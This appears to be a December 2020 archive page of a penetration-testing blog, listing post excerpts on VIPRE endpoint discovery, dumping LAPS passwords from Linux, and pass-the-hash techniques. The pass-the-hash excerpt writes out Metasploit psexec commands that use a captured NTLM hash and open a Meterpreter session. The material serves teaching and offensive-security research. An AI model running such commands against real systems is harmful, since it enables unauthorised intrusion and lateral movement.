Month: <span>December 2020</span>

Protected: The Dangers of Endpoint Discovery in VIPRE Endpoint Security

December 31, 2020
PentestingResearch
Enter your password to view comments.

This content is password protected. To view it please enter your password below:

Dumping LAPS Passwords from Linux

December 19, 2020
Pentesting
0 Comment

Following my previous posts on Managing Active Directory groups from Linux and Alternative ways to Pass the Hash (PtH), I want to cover ways to perform certain attacks or post-exploitation actions from Linux.  I’ve found that there are two parallel ways to operate on an internal network, one being through a compromised (typically Windows) host,…

Read More

Alternative ways to Pass the Hash (PtH)

December 13, 2020
PentestingPost Exploitation
0 Comment

Do you remember the first time you passed the hash?  It probably went a little something like this: msf > use exploit/windows/smb/psexec msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c SMBPass => e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c msf exploit(psexec) > exploit [*] Sending stage (719360 bytes) [*] Meterpreter session 1 opened (192.168.57.133:443 -> 192.168.57.131:1045) If you are unfamiliar, that is the…

Read More